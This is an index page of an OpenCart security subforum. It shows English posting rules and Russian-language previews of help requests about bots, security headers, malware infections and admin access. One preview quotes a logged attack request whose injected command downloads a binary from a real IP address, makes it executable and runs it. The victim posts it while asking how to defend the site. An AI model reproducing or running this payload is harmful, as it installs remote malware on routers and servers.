Questions about OpenCart Security
Security issues on cms OpenCart and all that is associated with this
Rules of the section
Communicate with people on the forum the way you would talk to them in real life. In everyday communication, we demonstrate good breeding, sedateness and solidity. Take an example from yourself and in virtual communication.
Remember, you are on a thematic forum, try to be guided by the norms of behavior that are accepted in the business environment. Send simple and clear messages that are understandable to all participants of the dialogue. Stick to the topic topic and ask questions about the case.
Do not be afraid to be friendly and sociable, use the opportunities of an informal environment, speak kindly and calmly. You can influence the environment and people, thereby creating a pleasant atmosphere on the forum.
If you do not like the interlocutors in the topic of communication or the situation that has developed in it, you should not write messages incriminating people who do not suit you. Each of you can just leave the topic and eliminate troubles from your life.
What should be avoided:
- non-normative vocabulary is taboo in the vast majority of forums and this one is no exception,
- insults - remember that every word can be used against you,
- threats - and such messages are prosecuted by law!
Guided by these simple rules, you will be able to avoid senseless disagreements and achieve constructive communication, as well as a speedy solution to your question or problem.
8 topics in this forum
-
- 2 followers
- 1 reply
- 5.3k views
Всем здравствуйте, после переезда на новые сервера, столкнулся по странными запросами вот такого вида: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) пытаются грузить на сервер shell и получить доступ к сайту, стандартные методы борьбы не особо помогают, менял права на /tmp на 755, 775, но сайт падает на 500, где сайт и /tmp могут быть связаны и как можно купировать эту проблему?
Last reply by Rashp, -
- 3 followers
- 5 replies
- 2.3k views
Всем здравствуйте, Кто-нибудь настраивал защиту от поведенческих ботов? Задолбали боты Biterika LLC, уже многое перепробовал, у меня есть настройка nginx - blackips, но мне кажется это полная шляпа и на работу движка как-то не хорошо влияет. Ставил какой-то г*в#* модуль Messor, тоже полная фигня. Кто-то настраивал блокировку по ASN не через cloudflare (не безопасно это сейчас настраивать). Или есть еще какие нибудь методы борьбы?
Last reply by Rashp, -
- 2 followers
- 0 replies
- 1.7k views
Здравствуйте, прописал наконец-то заголовки безопасности HTTP Headers в .htaccess на ocStore 2.3, и вроде сервисы показывают, что все правильно, но не покидает чувство, что что-то не так сделано))) веб сервис на связке nginx+Apache ocStore 2.3, может кто подскажет, все ли верно или может что поправить нужно или дописать? # Заголовки безопасности Header always unset X-Powered-By Header unset X-Powered-By <IfModule mod_headers.c> Header always set Strict-Transport-Security "max-age=31536000" env=HTTPS Header always set Content-Security-Policy "upgrade-insecure-requests" Header always set X-Content-Type-Options "nosniff" Header always set X-XSS-Protection "1…
Last reply by Niga, -
- 2 followers
- 1 reply
- 13.5k views
Добрый день! словил на одном из сайтов на ocstore 2.3 такую вирусню: - затирается главный файл .htaccess и в код главной страницы index.php в начало добавляется вредоносный код; - при попытке изменения .htaccess или index.php, они буквально через секунду снова перезатирались; - во ВСЕХ директориях сайта, который был основным зараженным, создались файлы .htaccess, запрещающие вам доступ чезер браузер к директориям; - создаются файлы в директориях сайта с вредоносным кодом и рандомным названием; - иногда встраивается вредоносный код в файлы; в логах обнаружил вот такое: Apr 16 04:22:07 vh320 apache_access[10209]: WWWSITE.com 194.87.218.48 - - [16/Apr/2023:0…
Last reply by halfhope, -
Ребята, подскажите какой лучше поставить Крон скрипт, присылающий на почту изменения времени модификации и появления новых файлов любых php,tpl,js Хочу поставить на сайт, как защиту от взлома сайта.
Last reply by Tom, -
- 2 followers
- 1 reply
- 1.2k views
Всем привет, подскажите актуальный чек лист для защиты сайта, админки сайта от взлома. Сайт на Opencart
Last reply by AlexDW, -
- 5 followers
- 10 replies
- 3.2k views
Доброго времени суток. Пожалуйста ребят, помогите восстановить доступ в админку магазина, Не могу понять почему не пускает в админку, боюсь как бы нас не взломали.. Помогите пожалуйста! Заранее вам благодарна!
Last reply by greendaytoday, -
- 2 followers
- 1 reply
- 1.3k views
Собственно вопрос в заголовке.
Last reply by Tom,